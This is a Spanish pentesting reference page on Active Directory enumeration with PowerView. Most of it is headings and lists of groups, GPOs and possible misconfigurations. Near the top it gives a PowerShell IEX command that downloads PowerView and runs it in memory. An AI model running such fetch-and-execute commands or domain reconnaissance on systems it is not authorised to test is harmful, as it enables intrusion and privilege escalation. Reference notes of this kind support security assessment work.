PowerView.ps1

Antes de ejecutar cualquiera de los comandos, se debe importar el comando:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1');

Quick enumeration

Domain info

Users, Groups and Computers

Logon and Sessions

Shared files and folders

GPOs & OUs

ACL

Domain Trust

Quick Win

Enumeración de Usuarios

Enumeración de Grupos

Vulnerabilidades posibles:

  • Grupos con privilegios que contienen demasiados miembros.

  • Grupos que no deberían existir (por ejemplo, restos de pruebas o configuraciones antiguas).

  • Grupos anidados que pueden ser explotados para elevar privilegios de forma indirecta.

Grupos relevantes en AD:

  1. Administradores del Dominio (Domain Admins): Miembros de este grupo tienen permisos completos y de control total en el dominio. Es el grupo más poderoso y es el objetivo principal para muchos atacantes.

  2. Administradores de la Empresa (Enterprise Admins): Estos administradores tienen permisos en todos los dominios de un bosque. Si una organización tiene múltiples dominios, este grupo es aún más poderoso que "Domain Admins".

  3. Administradores de Esquema (Schema Admins): Los miembros de este grupo pueden modificar el esquema del AD, que es la estructura subyacente que define objetos y atributos.

  4. Usuarios del Dominio (Domain Users): Este grupo incluye todas las cuentas de usuario en un dominio. A menudo se verifica para identificar posibles cuentas huérfanas o no utilizadas.

  5. Computadoras del Dominio (Domain Computers): Este grupo incluye todas las estaciones de trabajo y servidores unidos al dominio.

  6. Controladores de Dominio (Domain Controllers): Este grupo incluye todos los controladores de dominio en un dominio. Es esencial garantizar que sólo las máquinas confiables sean parte de este grupo.

  7. Política de replicación de lectura (Read-Only Domain Controllers - RODC): Si la organización utiliza RODCs, es esencial garantizar que estén configurados correctamente.

Enumeración de Computadoras

Vulnerabilidades posibles:

  • Sistemas sin parches o desactualizados.

  • Computadoras con servicios vulnerables expuestos.

  • Identificación de sistemas críticos, como servidores de bases de datos o controladores de dominio.

Enumeración de GPO

Vulnerabilidades posibles:

  • Políticas mal configuradas que podrían permitir a un atacante moverse libremente o elevar privilegios.

  • GPOs que establecen configuraciones inseguras o permisos laxos.

  • Información sobre scripts de inicio o cierre de sesión que podrían ser explotados.

GPOs relevantes en AD:

  1. Default Domain Policy: Esta es la GPO que se aplica a todo el dominio. A menudo se revisa para configuraciones de seguridad, como políticas de contraseñas y restricciones de cuenta.

  2. Default Domain Controllers Policy: Se aplica específicamente a los controladores de dominio. Es crucial revisarla para configuraciones que afecten la seguridad de los controladores de dominio, como configuraciones de auditoría y derechos de usuario.

  3. Account Lockout Policy: Esta política define cuántos intentos de inicio de sesión fallidos causarán que una cuenta sea bloqueada y durante cuánto tiempo. Es fundamental para proteger contra intentos de fuerza bruta.

  4. Password Policy: Define los requisitos para contraseñas de usuario, como longitud mínima, complejidad y duración máxima.

Enumeración de ACL

Vulnerabilidades posibles:

  • ACLs mal configuradas que otorgan acceso excesivo a recursos críticos.

  • Permisos heredados que no deberían aplicarse a ciertos recursos.

  • Posibilidades de escalada de privilegios debido a permisos inapropiados.

Última actualización